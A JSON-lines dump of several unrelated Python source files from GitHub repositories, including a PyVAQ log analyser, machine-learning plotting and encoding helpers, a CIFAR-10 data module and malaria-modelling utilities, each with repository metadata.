logEntries[key]:\n index, type, lines = logEntry\n print(' {index}: {type}'.format(index=index, type=type))\n for line in lines:\n print(' {line}'.format(line=line))\n# pp.pprint(logEntries)\n\npp = pprint.PrettyPrinter(width=240)\nroot, thisScript = os.path.split(os.path.realpath(__file__))\n\nif len(sys.argv) > 1:\n # Don't use most recent log, look back N logs, N given by the first commandline argument\n lookback = int(sys.argv[1])\nelse:\n lookback = 0\n\n#root = 
r'C:\\Users\\Goldberg\\Documents\\PyVAQ'\nlogFolder = os.path.join(root, 'logs')\nlogs = sorted(os.listdir(logFolder))\nlastLog = os.path.join(logFolder, logs[-1-lookback])\nprint('Analyzing log:', lastLog)\nwith open(lastLog, 'r') as f:\n logText = f.read();\n\n# afreq = float(re.findall('actual audio frequency\\: *([0-9\\.]*)', logText)[0])\n# vfreq = float(re.findall('actual video frequency\\: *([0-9\\.]*)', logText)[0])\n# sampList = [int(sampNum) for sampNum in re.findall('\\# samples\\:([0-9]*)', logText)]\n# frameList = [int(frameNum) for frameNum in re.findall('\\# frames\\:([0-9]*)', logText)]\n# imageIDList = [int(imageID) for imageID in re.findall('Image ID\\:([0-9]*)', logText)]\n# if len(sampList) * len(frameList) > 0:\n# chunkSize = 1000\n# sampT = np.array(range(len(sampList))) / (afreq / chunkSize)\n# frameT = np.array(range(len(frameList))) / (vfreq)\n#\n# frameInterp = np.interp(sampT, frameT, frameList)\n# print('Max audio/video chunk/frame discrepancy:')\n# print('Expected: <', max([chunkSize/afreq, 1/vfreq]))\n# print('Actual: ', max((np.array(sampList) * vfreq / afreq) - frameInterp) * (1/vfreq))\n#\n# print('Dropped frames:', max(abs((1 + np.array(imageIDList)) - np.array(frameList))))\n\nlogEntries = parseLog(logText)\nfilterList = []\nfilteredLogEntries = copy.deepcopy(logEntries)\nordered = False\n\nsummarizeLog(logEntries, filteredLogEntries)\nprint()\n\nwhile True:\n printEntries = True\n filtInput = input(\"Enter a filtering command ('h' for help): \")\n try:\n filtType, filt = filtInput.split(' ', maxsplit=1)\n except ValueError:\n filtType = filtInput\n filt = ''\n newFilteredLogEntries = copy.deepcopy(filteredLogEntries)\n if filtType == 'i':\n # INDEX FILTERING\n newFilteredLogEntries = {}\n filterList.append(filtInput)\n cnt, rad = [int(i) for i in filt.strip().split(' ')]\n for key in filteredLogEntries:\n for entry in filteredLogEntries[key]:\n index, state, content = entry\n if abs(index - cnt) <= rad:\n if key not in newFilteredLogEntries:\n newFilteredLogEntries[key] = [];\n newFilteredLogEntries[key].append(entry)\n elif filtType == 'rx':\n filterList.append(filtInput)\n filtRegex = re.compile(filt, flags=re.MULTILINE)\n groups = filtRegex.groups + 1\n extractedData = []\n matches = []\n maxMatchLengths = [0 for k in range(groups)]\n for key in filteredLogEntries.keys():\n for entry in filteredLogEntries[key]:\n index, state, content = entry\n matches += re.finditer(filtRegex, '\\n'.join(content))\n for match in matches:\n extractedDatum = []\n for k in range(groups):\n extractedDatum.append(match.group(k))\n maxMatchLengths[k] = max(maxMatchLengths[k], len(extractedDatum[k])+2)\n extractedData.append(extractedDatum)\n\n print(''.join(['{data['+str(k)+']:{width['+str(k)+']}}' for k in range(groups)]).format(data=['Match'] + ['Group {k}'.format(k=k) for k in range(groups)], width=maxMatchLengths))\n for extractedDatum in extractedData:\n print(''.join(['{data['+str(k)+']:{width['+str(k)+']}}' for k in range(groups)]).format(data=extractedDatum, width=maxMatchLengths))\n elif filtType == 'r':\n # REGEX FILTERING\n newFilteredLogEntries = {}\n filterList.append(filtInput)\n negate = False\n if filt.split(' ')[0] == 'not':\n filt = filt.split(' ', maxsplit=1)[1]\n negate = True\n filtRegex = re.compile(filt, flags=re.MULTILINE)\n for key in filteredLogEntries.keys():\n for entry in filteredLogEntries[key]:\n index, state, content = entry\n if negate ^ bool(re.search(filtRegex, '\\n'.join(content))):\n if key not in newFilteredLogEntries:\n 
newFilteredLogEntries[key] = []\n newFilteredLogEntries[key].append(entry)\n elif filtType == 't':\n # ENTRY TYPE REGEX FILTERING\n newFilteredLogEntries = {}\n filterList.append(filtInput)\n filtRegex = re.compile(filt)\n for key in filteredLogEntries.keys():\n if re.search(filtRegex, key):\n newFilteredLogEntries[key] = []\n for entry in filteredLogEntries[key]:\n newFilteredLogEntries[key].append(entry)\n elif filtType == 'c':\n printEntries = False\n filterList = []\n filteredLogEntries = copy.deepcopy(logEntries)\n newFilteredLogEntries = copy.deepcopy(filteredLogEntries)\n print('Clearing all filters')\n elif filtType == 'o':\n ordered = not ordered\n if ordered:\n print('Index ordering is now on')\n else:\n print('Index ordering is now off')\n elif filtType == 'h':\n printEntries = False\n # Help with filtering:\n helptext = '''\nFilter syntax:\n Regex filtering:\n r REGEX\n REGEX = a regular expression to filter by\n r not REGEX\n Displays all entries that do NOT match the regex\n Index filtering:\n i MID RAD\n Displays all entries numnbers from MID - RAD to MID + RAD\n Toggle ordering\n o\n Toggle between printing ordered by time index, or sorted by log type\n Display help\n h\n Print help text'''\n print(helptext)\n print()\n else:\n printEntries = False\n print('Filter command not recognized. Type \"h\" for help.')\n continue\n\n filteredLogEntries = copy.deepcopy(newFilteredLogEntries)\n\n if printEntries:\n filteredCount = sum([len(filteredLogEntries[key]) for key in filteredLogEntries])\n\n if filteredCount > 100:\n howMany = input('There are {n} entries. Display all/some/none (a/s/n)? '.format(n=filteredCount))\n if howMany == 'a':\n printLog(filteredLogEntries, abridge=False, ordered=ordered)\n elif howMany == 's':\n printLog(filteredLogEntries, abridge=True, ordered=ordered)\n else:\n printLog(filteredLogEntries, abridge=False, ordered=ordered)\n\n print()\n\n summarizeLog(logEntries, filteredLogEntries)\n print()\n\n if len(filterList) > 0:\n print('Filters:')\n for filt in filterList:\n print('\\t'+filt)\n print()\n\n\n#errorList = re.findall('([Ee]rror in [a-zA-Z\\ ]*)([^\\|]*)\\|\\|', logText, flags=(re.MULTILINE | re.DOTALL))\n#for errorState, errorDescription in errorList:\n# errorParts = errorDescription.split()\n# errorName = errorParts[-1]\n# print(errorState, errorName)\nr'''\n|| *********************************** /\\ AW BUFFERING /\\ ********************************************\n|| Update trigger to stop now\n|| msg=, exitFlag=False\n|| *********************************** /\\ AT ANALYZING /\\ ********************************************\n|| VW_19355735 - partially missed trigger by 2.0140631198883057 seconds, which is 60.421908702126345 frames!\n|| msg=, exitFlag=False\n|| *********************************** /\\ VW_19355735 BUFFERING /\\ ********************************************\n|| VA_19355735 ERROR STATE. 
Error messages:\n\n\n|| Error in ACQUIRING state\n\nTraceback (most recent call last):\n File \"C:\\Users\\GLab\\Documents\\PyVAQ\\StateMachineProcesses.py\", line 2565, in run\n self.imageQueue.put(imageResult, metadata={'frameTime':frameTime})\n File \"C:\\Users\\GLab\\Documents\\PyVAQ\\SharedImageQueue.py\", line 113, in put\n self.metadataQueue.put(metadata, block=False)\n File \"C:\\Users\\GLab\\AppData\\Local\\Programs\\Python\\Python37\\lib\\multiprocessing\\queues.py\", line 83, in put\n raise Full\nqueue.Full\n\n|| msg=, exitFlag=False\n|| *********************************** /\\ VA_19355735 ERROR /\\ ********************************************\n|| AW - Sending audio filename to merger\n|| msg=, exitFlag=False\n|| *********************************** /\\ AW WRITING /\\ ********************************************\n|| Send new trigger!\n'''\n","repo_name":"GoldbergLab/PyVAQ","sub_path":"analyzePyVAQLog.py","file_name":"analyzePyVAQLog.py","file_ext":"py","file_size_in_byte":11642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25208970676","text":"\"\"\"\ncustom functions for machine learning projects\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn import metrics\nfrom sklearn.preprocessing import OneHotEncoder\n\ndef onehotencode(X, keep_index=False):\n \"\"\"\n One hot encode categorical variables for a single dataframe\n \"\"\"\n X_ind = X.index\n X_obj = X[[col for col, dtype in list(zip(X.columns, X.dtypes)) if dtype == np.dtype('O')]]\n X_nonobj = X[[col for col, dtype in list(zip(X.columns, X.dtypes)) if dtype != np.dtype('O')]]\n\n ohe = OneHotEncoder(handle_unknown='ignore')\n X_obj_ohe = ohe.fit_transform(X_obj)\n\n X_nonobj_df = pd.DataFrame(X_nonobj).reset_index(drop=True)\n X_obj_ohe_df = pd.DataFrame(X_obj_ohe.todense(), columns=ohe.get_feature_names()).reset_index(drop=True)\n\n X_all = pd.concat([X_nonobj_df, X_obj_ohe_df], axis=1)\n\n if keep_index:\n X_all.index = X_ind\n\n return X_all\n\ndef onehotencode_train_test(train, test, keep_index=False):\n \"\"\"\n Take train and test datasets in the form of panda dataframes, \n onehotencode categorical in both train and test sets by \n fitting to train set ony. 
Return both datasets with onehotencoded variables.\n    If keep_index True, original index in train and test will be kept, otherwise\n    index will be reset for both.\n    \"\"\"\n    train_ind = train.index\n    test_ind = test.index\n\n    train_obj = train[[col for col, dtype in list(zip(train.columns, train.dtypes))\n                       if dtype == np.dtype('O')]]\n    train_nonobj = train[[col for col, dtype in list(zip(train.columns, train.dtypes))\n                          if dtype != np.dtype('O')]]\n    \n    test_obj = test[[col for col, dtype in list(zip(test.columns, test.dtypes))\n                     if dtype == np.dtype('O')]]\n    test_nonobj = test[[col for col, dtype in list(zip(test.columns, test.dtypes))\n                        if dtype != np.dtype('O')]]\n\n    ohe = OneHotEncoder(handle_unknown='ignore')\n    train_obj_ohe = ohe.fit_transform(train_obj)\n\n    train_nonobj_df = pd.DataFrame(train_nonobj).reset_index(drop=True)\n    train_obj_ohe_df = pd.DataFrame(train_obj_ohe.todense(), columns=ohe.get_feature_names()).reset_index(drop=True)\n    train_all = pd.concat([train_nonobj_df, train_obj_ohe_df], axis=1)\n\n    test_obj_ohe = ohe.transform(test_obj)\n    test_nonobj_df = pd.DataFrame(test_nonobj).reset_index(drop=True)\n    test_obj_ohe_df = pd.DataFrame(test_obj_ohe.todense(), columns=ohe.get_feature_names()).reset_index(drop=True)\n    test_all = pd.concat([test_nonobj_df, test_obj_ohe_df], axis=1)\n\n    if keep_index:\n        train_all.index = train_ind\n        test_all.index = test_ind\n    \n    return train_all, test_all\n\ndef plot_confusion_matrix(y_true, y_pred, model_name='', cmap=plt.cm.Blues):\n    \"\"\"\n    plot confusion matrix for array of true labels and array of predictions from \n    a classifier model\n    \"\"\"\n    #initialize confusion matrix\n    cm = metrics.confusion_matrix(y_true, y_pred)\n    cm_norm = metrics.confusion_matrix(y_true, y_pred, normalize='true')\n\n    #turn off gridlines (if any)\n    plt.grid(b=None)\n    #plot basic matrix\n    plt.imshow(cm_norm, cmap=cmap)\n\n    #add title and axis labels\n    plt.title('Confusion Matrix {}'.format(model_name))\n    plt.xlabel('Predictions')\n    plt.ylabel('True Labels')\n\n    #add axis scale and markers\n    class_names = set(np.unique(y_true))\n    tick_marks = np.arange(len(class_names))\n    plt.xticks(tick_marks, class_names, rotation=45, fontsize=12)\n    plt.yticks(tick_marks, class_names, fontsize=12)\n\n    #format matrix\n    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n        plt.text(j, i, cm[i,j], horizontalalignment='center', fontdict={'size':12},\n                 color='white' if cm_norm[i,j] > 0.5 else 'black')\n\ndef plot_roc_curve(y_labels, y_score, clf_name='Binary Classifier'):\n    \"\"\"\n    plot roc curve for one set of true labels and prediction scores for a binary classifier\n    \"\"\"\n    plt.style.use('ggplot')\n    #colors = sns.color_palette('Set2')\n\n    fpr, tpr, thresholds = metrics.roc_curve(y_labels, y_score)\n\n    plt.figure(figsize=(8,6))\n    plt.plot([0,1], [0,1], 
linestyle='--', label='random')\n plt.plot(fpr_train, tpr_train, color=colors[1], marker='.', label='train set')\n plt.plot(fpr_test, tpr_test, color=colors[0], marker='.', label='test set')\n plt.title('ROC Curve - {}'.format(clf_name))\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate (Recall)')\n plt.legend(loc='lower right')\n\n return plt\n\ndef plot_precision_recall_curve(y_labels, y_score, clf_name='Binary Classifier'):\n \"\"\"\n plot precision-recall curve for set of binary labels and prediction scores\n \"\"\"\n plt.style.use('ggplot')\n colors = sns.color_palette('Set2')\n\n pr, rc, thresholds = metrics.precision_recall_curve(y_labels, y_score)\n\n imb = sum(y_labels==1)/len(y_labels)\n\n plt.figure(figsize=(8,6))\n plt.plot([0,1], [imb,imb], linestyle='--', label='random')\n plt.plot(rc, pr, color=colors[1], marker='.')\n plt.title('Precision-Recall Curve - {}'.format(clf_name))\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.legend()\n\n return plt\n\ndef plot_train_test_precision_recall_curve(y_test, y_test_score, y_train, y_train_score, \n clf_name='Binary Classifier'):\n \"\"\"\n plot precision-recall curve for training and test sets on the same graph\n \"\"\"\n plt.style.use('ggplot')\n colors = sns.color_palette('Set2')\n\n pr_test, rc_test, thresholds_test = metrics.precision_recall_curve(y_test, y_test_score)\n pr_train, rc_train, thresholds_train = metrics.precision_recall_curve(y_train, y_train_score)\n\n imb_test = sum(y_test==1)/len(y_test)\n imb_train = sum(y_train==1)/len(y_train)\n imb_avg = (imb_test + imb_train)/2\n\n plt.figure(figsize=(8,6))\n plt.plot([0,1], [imb_avg, imb_avg], linestyle='--', label='random')\n plt.plot(rc_train, pr_train, color=colors[1], marker='.', label='train set')\n plt.plot(rc_test, pr_test, color=colors[0], marker='.', label='test set')\n plt.title('Precision-Recall Curve - {}'.format(clf_name))\n plt.xlabel('Recall (True Positive Rate)')\n plt.ylabel('Precision')\n plt.legend()\n\n return plt\n\ndef find_threshold_by_recall(y_labels, y_score, recall):\n \n fpr, tpr, thresholds = metrics.roc_curve(y_labels, y_score)\n ix = np.where(np.logical_and(tpr>=recall, tpr<(recall+0.1)))[0][0]\n\n return thresholds[ix]\n\ndef find_kstat(y_labels, y_score):\n\n fpr, tpr, thresholds = metrics.roc_curve(y_labels, y_score)\n kstat = max(tpr-fpr)\n kstat_thresh = thresholds[np.argmax(tpr-fpr)]\n\n return kstat, kstat_thresh\n\ndef display_result_summary(y_test, y_test_score, y_train, y_train_score, \n model_name='Trained Classifier'):\n\n train_auc = metrics.roc_auc_score(y_train, y_train_score)\n train_ar = 2*train_auc-1\n train_ks, train_ks_thresh = find_kstat(y_train, y_train_score)\n\n test_auc = metrics.roc_auc_score(y_test, y_test_score)\n test_ar = 2*test_auc-1\n test_ks, test_ks_thresh = find_kstat(y_test, y_test_score)\n\n print('Model Results - {}'.format(model_name))\n print('')\n print('+-------------------------------------------+')\n print('| Metric | Test Set | Train Set |')\n print('+-------------------------------------------+')\n print('| AUC Score | {:.5f} | {:.5f} |'.format(test_auc, train_auc))\n print('+-------------------------------------------+')\n print('| AR Score | {:.5f} | {:.5f} |'.format(test_ar, train_ar))\n print('+-------------------------------------------+')\n print('| KS Stat | {:.5f} | {:.5f} |'.format(test_ks, train_ks))\n print('+-------------------------------------------+')\n\ndef find_divergence(y_labels, y_score):\n \"\"\"\n Find divergence of a binary classifier, with labels 0 
and 1\n    \"\"\"\n\n    y_true = np.array(y_labels)\n    y_score1 = y_score[np.where(y_true>0)[0]]\n    y_score0 = y_score[np.where(y_true==0)[0]]\n    \n    div = (np.mean(y_score1)-np.mean(y_score0))**2/(np.var(y_score1)+np.var(y_score0))\n\n    return div\n","repo_name":"bl419cam/Machine-Learning-Toolkit","sub_path":"custom_functions.py","file_name":"custom_functions.py","file_ext":"py","file_size_in_byte":9047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"10635430238","text":"# Write your own decorator that catches errors\r\n# raised while the wrapped function is running,\r\n# logs them, and re-raises the caught error\r\nimport datetime\r\n\r\n\r\ndef log_err(func):\r\n    def wrap(*args, **kwargs):\r\n        try:\r\n            result = func(*args, **kwargs)\r\n            return result\r\n        except Exception as e:\r\n            print(f'{datetime.datetime.now()} ',\r\n                  f'Exception in function {func.__name__}: {e}')\r\n            raise e\r\n    return wrap\r\n\r\n\r\n@log_err\r\ndef bad_func(a, b):\r\n    return a / b\r\n\r\n\r\nprint(bad_func(2, 0))\r\n","repo_name":"vadimhl/task.education.nixsolutions.com","sub_path":"task_03.py","file_name":"task_03.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"27366447560","text":"import pandas as pd\nimport json\nimport os\nimport numpy as np\n\nclass Feature_extraction:\n\tdef __init__(self,data_path, dfs):\n\t\t\n\t\tself.data_path = data_path\n\t\tself.dfs = dfs\n\n\t\tself.file_list = [f for f in os.listdir(self.data_path) if not f.startswith('.')] \n\t\tself.n_files = len(self.file_list)\n\n\t\tself.ends=[]\n\n\n\t\tfor fi, file_id in enumerate(self.file_list):\n\t\t\tself.meta = json.load(open(os.path.join(self.data_path,file_id, 'meta.json')))\n\t\t\tself.ends.append(self.meta['end'])\n\t\t\n\n\n\tdef get_features(self,time_window,fxn_list):\n\t\t'''time_window in ms'''\n\n\t\tlower = np.arange(0,self.ends[0],time_window)\n\t\tupper = np.arange(time_window,self.ends[0]+time_window,time_window)\n\t\t\n\n\t\ttest = self.dfs[0]\n\n\n\t\tsensor_col_n = test.shape[1]\n\t\tarr_test = np.array([int(self.ends[0]/time_window+1),len(fxn_list*sensor_col_n)])\n\n\t\tfor fxn in fxn_list:\n\n\t\t\tfor lb, ub in zip(lower,upper):\n\t\t\t\tprint(lb,ub)\n\n\t\t\t\tdata = self._slice_df(test,lb,ub)\n\t\t\t\t\n\t\t\t\tfor i in range(sensor_col_n):\n\n\t\t\t\t\tprint(len(data[data.columns[i]]))\n\n\n\n\t\t\t\t# print(fxn(data))\n\n\n\n\n\n\n\tdef _slice_df(self,df,start,end):\n\t\tidx = (df.index>=start) & (df.index<end)\n\t\treturn df[idx] \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"alebyk113/sph_ch_accel","sub_path":"feature_ext_.py","file_name":"feature_ext_.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"8106206158","text":"from torchvision.datasets import CIFAR10\nimport pytorch_lightning as pl\nfrom torch.utils.data import random_split, DataLoader\nfrom torchvision.transforms import AutoAugment, AutoAugmentPolicy, ToTensor, Compose, Normalize\n# from pl_bolts.transforms.dataset_normalizations import cifar10_normalization\nimport numpy as np\n\ndef get_normalization_parameters(dataset):\n    stacked = [np.array(k[0]) for k in dataset]\n    stacked = np.stack(stacked, axis=-1)\n    means = stacked.mean(axis=(1, 2, 3))\n    stds = stacked.std(axis=(1, 2, 3))\n    return means, stds\n\nclass CIFAR10_wrapper(pl.LightningDataModule):\n    def __init__(self, data_location, batch_size, workers):\n        
super().__init__()\n self.workers = workers\n self.path = data_location\n self.batch_size = batch_size\n\n def setup(self, stage=None):\n to_tensor = ToTensor()\n train_data = CIFAR10(self.path, train=True, download=True, transform=to_tensor)\n means, stds = get_normalization_parameters(train_data)\n normalization_transform = Normalize(mean=means, std=stds)\n augment_policy = AutoAugment(AutoAugmentPolicy.CIFAR10)\n\n transforms_train = Compose([\n augment_policy,\n to_tensor,\n normalization_transform\n ])\n\n transforms_test = Compose([\n to_tensor,\n normalization_transform\n ])\n\n train_data = CIFAR10(self.path, train=True, download=True, transform=transforms_train)\n self.cifar_test = CIFAR10(self.path, train=False, download=True, transform=transforms_test)\n self.cifar_train, self.cifar_val = random_split(train_data, (.90, .1))\n\n\n def train_dataloader(self):\n return DataLoader(self.cifar_train, self.batch_size, shuffle=True, num_workers=self.workers)\n\n def val_dataloader(self):\n return DataLoader(self.cifar_val, self.batch_size, num_workers=self.workers)\n\n def test_dataloader(self):\n return DataLoader(self.cifar_test, self.batch_size, num_workers=self.workers)","repo_name":"Hierakonpolis/test_task","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4258435651","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 12:13:25 2019\n\n@author: rowan.martin-hughes\n\"\"\"\n\nimport atomica as at\nimport sciris as sc\nimport numpy as np\n\nfrom os import sep, path\n\nfrom datetime import datetime\ntime = datetime.now().strftime(\"%H:%M:%S\")\ndate = datetime.now().strftime(\"%Y%m%d\")\n\ndef _get_gdrive_folder(country=None):\n import socket\n user = socket.gethostname()\n \n if country is None:\n country_str = ''\n else:\n country_str = '%s%sProject%s'%(country, sep, sep)\n\n apps_folder = '../'\n user = 'rmh'\n user_initials = 'rmh'\n \n return path.join(path.abspath(apps_folder),''), user_initials # ensure trailing separator\n\ngdrive, user_initials = _get_gdrive_folder()\ndef user_version(): #defined as a function as 'date' might be changed to match previous results\n return '%s_%s' % (date, user_initials)\n\nroot = path.abspath(path.join(at.parent_dir(),'..'))+path.sep # repository root dir\n\ndef get_malaria_analyses_version():\n return at.fast_gitinfo(__file__)\n\ndef try_loading(function, fnargs, obj_filename, obj_folder, load_objects=True, run_if_unfound=True):\n \"\"\"helper function to try loading a pre-run object from a folder, or recreate it if not available\"\"\"\n try:\n assert load_objects\n obj = sc.loadobj(obj_filename, folder=obj_folder)\n except:\n if run_if_unfound:\n obj = function(**fnargs)\n sc.saveobj(obj=obj, filename=obj_filename, folder=obj_folder)\n else:\n return None\n return obj\n\n\n\ndef get_apps_folder(country=None):\n \n if country is None:\n country_str = ''\n else:\n country_str = country #'%s%sProject%s'%(country, sep, sep)\n \n apps_folder = gdrive + country_str\n \n return apps_folder\n\ndef get_paths(folder, inclusions=[], extensions=['.xlsx'], exclusions=['~'],\n version='latest', verbose=True, case_sensitive=False, folder_depth=0):\n #find the highest alphabetical databook, framework, and progbook in the project_folder\n #if multiple exist, would pick the one with the highest date\n #ignore anything with a '~' as these are temporary files\n from glob import glob\n contains = 
sc.promotetolist(inclusions)+sc.promotetolist(extensions)\n excludes = sc.promotetolist(exclusions)\n extra_str = '*%s'%(sep) * folder_depth + '*'\n files = glob(folder+extra_str)\n if case_sensitive:\n valid_files = [file for file in files if np.array([con.lower() in file.lower() for con in contains]).all()]\n valid_files = [file for file in valid_files if np.array([not exc.lower() in file.lower() for exc in excludes]).all()]\n else:\n valid_files = [file for file in files if np.array([con in file for con in contains]).all()]\n valid_files = [file for file in valid_files if np.array([not exc in file for exc in excludes]).all()]\n \n if len(valid_files)==0:\n if verbose: print('Could not find a file containing all of %s and none of %s in folder %s'%(contains, excludes, folder))\n return None\n elif version=='latest':\n valid_files = valid_files[-1]\n \n if verbose: print('Found \\'%s\\' file(s): %s'%(inclusions, valid_files))\n return valid_files\n \n \ndef save_run_info(run_info: str = '', folder=None, filename=None):\n if filename is None:\n filename = 'Run info_%s.txt'%(date)\n if folder is None:\n folder = '' #save it into the script folder\n \n filepath = folder+filename\n \n run_info+= 'Date %s, %s\\n'%(date, time)\n run_info+= 'Atomica version %s\\n'%at.__version__\n run_info+= 'Atomica git details %s\\n'%(at.__gitinfo__)\n run_info+= 'Sciris version %s, %s\\n'%(sc.__version__, sc.__versiondate__)\n run_info+= 'Malaria analyses git details %s\\n'%(get_malaria_analyses_version())\n \n try:\n file = open(filepath, 'w+')\n file.write(run_info)\n file.close()\n return True\n except:\n print('WARNING: Could not save results to %s, file is probably already open.'%(filepath))\n return False\n \ndef export_raw_results(results, results_folder):\n if isinstance(results, at.Project):\n results = results.results.values()\n \n import os\n os.makedirs(results_folder, exist_ok=True)\n for result in results:\n results_path = results_folder+'export_raw_%s_%s.xlsx'%(result.name, date)\n try:\n result.export_raw(filename=results_path)\n except: 'WARNING: could not save raw results %s.'%(results_path)\n\ndef getpops(P, pop='hum'):\n return [key for key, details in P.data.pops.items() if details['type']==pop]\n\ndef allequal(x):\n '''return true if all elements of a list/array are equal'''\n return len(set(x)) <=1\n\ndef sigfigs(x):\n if type(x)==str: return x\n return sc.sigfig(X=x, sigfigs=2, SI=False, sep=True, keepints=False)\n\ndef start_logging(filename=None, folder=None):\n \"\"\"save an output file of console output\"\"\"\n import logging\n import os\n \n if filename is None: filename='script_logging.log'\n \n if not folder is None:\n try:\n os.makedirs(folder, exist_ok=True)\n except:\n print('ERROR: Could not create a results folder at %s'%(folder))\n return False\n \n logger = logging.getLogger()\n h = logging.FileHandler(folder+filename,mode='w')\n logger.addHandler(h)\n return logger\n\n\n\n\n\ndef _filter_pops_by_output(result, output) -> list:\n \"\"\"\n Helper function for plotting quantities\n Copied from results.py\n\n With population types, a given output/output aggregation may only be defined\n in a subset of populations. To deal with this when plotting Result objects,\n it's necessary to work out which population the requested output aggregation can be\n plotted in. This function takes in an output definition and returns a list of populations\n matching this.\n\n :param output: An output aggregation string e.g. 
'alive' or ':ddis' or {['lt_inf','lteu']} (supported by PlotData/get_variable)\n    :return: A list of population code names\n\n    \"\"\"\n\n    if sc.isstring(output):\n        vars = result.get_variable(output)\n    elif isinstance(output, list):\n        vars = result.get_variable(output[0])\n    elif isinstance(output, dict):\n        v = list(output.values())[0]\n        if isinstance(v, list):\n            vars = result.get_variable(v[0])\n        elif sc.isstring(v):\n            # It could be a function aggregation or it could be a single one\n            _, deps = parse_function(v)\n            vars = result.get_variable(deps[0])\n    else:\n        raise Exception('Could not determine population type')\n    return [x.pop.name for x in vars]\n\ndef get_data(results, output, tdict):\n    \"\"\"\n    Convert an output to a DataFrame for a group of results\n    Copied from results.py and adapted\n\n    This function takes in a list of results, and an output specification recognised by :class:`PlotData`.\n    It extracts the outputs from all results and stores them in a 3-level MultiIndexed dataframe, which is\n    returned. The index levels are the name of the output, the name of the results, and the populations.\n\n    In addition, this function attempts to aggregate the outputs, if the units of the outputs match\n    known units. If the units lead to an obvious use of summation or weighted averaging, it will be used.\n    Otherwise, the output will contain NaNs for the population-aggregated results, which will appear as empty\n    cells in the Excel spreadsheet so the user is able to fill them in themselves.\n\n    :param results: List of Results\n    :param output_name: The name to use for the output quantity\n    :param output: An output specification/aggregation supported by :class:`PlotData`\n    :param tdict: Outputs will be interpolated onto the times in this dictionary of lists of tvecs (typically would be annual)\n    :return: a PlotData\n\n    \"\"\"\n    output_name = output\n    \n    pops = _filter_pops_by_output(results[0], output)\n    pop_labels = {x: y for x, y in zip(results[0].pop_names, results[0].pop_labels) if x in pops}\n    data = dict()\n    \n    popdata = at.PlotData(results, pops=pops, outputs=output)\n    if popdata.series[0].units in {at.FrameworkSettings.QUANTITY_TYPE_NUMBER, results[0].model.pops[0].comps[0].units}:\n        action_fn = sum\n        pop_aggregation = 'sum'\n    elif popdata.series[0].units in {at.FrameworkSettings.QUANTITY_TYPE_FRACTION,\n                                     at.FrameworkSettings.QUANTITY_TYPE_PROPORTION,\n                                     at.FrameworkSettings.QUANTITY_TYPE_PROBABILITY} or 'prev' in output:\n        action_fn = np.mean\n        pop_aggregation = 'weighted'\n    else:\n        print ('Not clear which units to use over time for %s, sum.'%(output_name))\n        action_fn = sum\n\n    for tname, tvals in tdict.items():\n        popdata = at.PlotData(results, pops=pops, outputs=output)\n        assert len(popdata.outputs) == 1, 'Framework plot specification should evaluate to exactly one output series - there were %d' % (len(popdata.outputs))\n        popdata.interpolate(tvals)\n        \n        for result in popdata.results:\n            for pop_name in popdata.pops:\n                time_vals = popdata[result, pop_name, popdata.outputs[0]].vals\n                \n                data[(output_name, popdata.results[result], pop_labels[pop_name], tname)] = action_fn(time_vals)\n        \n        \n        agg_popdata = at.PlotData(results, outputs=output, pops={'total': pops}, pop_aggregation=pop_aggregation)\n        agg_popdata.interpolate(tvals)\n        for result in agg_popdata.results:\n            data[(output_name, agg_popdata.results[result], 'Total (sum)', tname)] = action_fn(agg_popdata[result, agg_popdata.pops[0], agg_popdata.outputs[0]].vals)\n    \n#    df = pd.DataFrame(data, index=tvals)\n#    df = df.T\n#    df.index = 
df.index.set_names(['output', 'result', 'pop']) # Set the index names correctly so they can be reordered easily\n return data\n\n \ndef export_quick_comparison(results, variables, pops = None, res_names = None, year_dict={'2016': 2016, '2016 - 2030': list(range(2016, 2031)), '2030': 2030},\n filename='parameter comparison.xlsx', folder=None):\n data = [['Parameter (display)', 'Parameter (model)', 'Self-comparison', 'Same-year', 'Population', 'Baseline result', 'Baseline year(s)', 'Baseline value',\n 'Outcome result', 'Outcome year(s)', 'Outcome value', 'Percentage difference', 'Absolute difference']]\n all_resnames = [res.name for res in results]\n if res_names is None:\n res_names = all_resnames\n if not pops is None:\n comp_pops = pops #same for all\n \n \n for var in variables:\n var_name = results[0].model.framework.get_variable(var)[0]['display name'] #assume results all have the same framework...\n\n for brn in res_names:\n for byn, bys in year_dict.items():\n bys = sc.promotetolist(bys)\n for orn in res_names:\n for oyn, oys in year_dict.items():\n oys = sc.promotetolist(oys)\n #it only makes sense to compare changes between the same result and different years, or the same year and different results.\n if bys == oys or (brn == orn and len(oys) == len(bys)): \n df = get_data(results=results, output=var, tdict = year_dict)\n# print (df.keys())\n if pops is None:\n comp_pops = list(set([x[2] for x in df.keys()])) #assume pops are the same through all results.......\n for pop in comp_pops:\n self_comp = 'Y' if brn == orn else ''\n same_year = 'Y' if bys == oys else ''\n base_val = df[var, brn, pop, byn]\n out_val = df[var, orn, pop, oyn]\n \n percent_diff = (out_val - base_val)/max(base_val, 1e-15)\n abs_diff = (out_val - base_val)\n \n data.append([var_name, var, self_comp, same_year, pop, brn, byn, base_val,\n orn, oyn, out_val, percent_diff, abs_diff])\n sc.savespreadsheet(filename=filename, data=data, folder=folder)\n","repo_name":"rihickson/vivax-primaquine-Cambodia","sub_path":"code/malaria_utils/utils_malaria.py","file_name":"utils_malaria.py","file_ext":"py","file_size_in_byte":12466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} 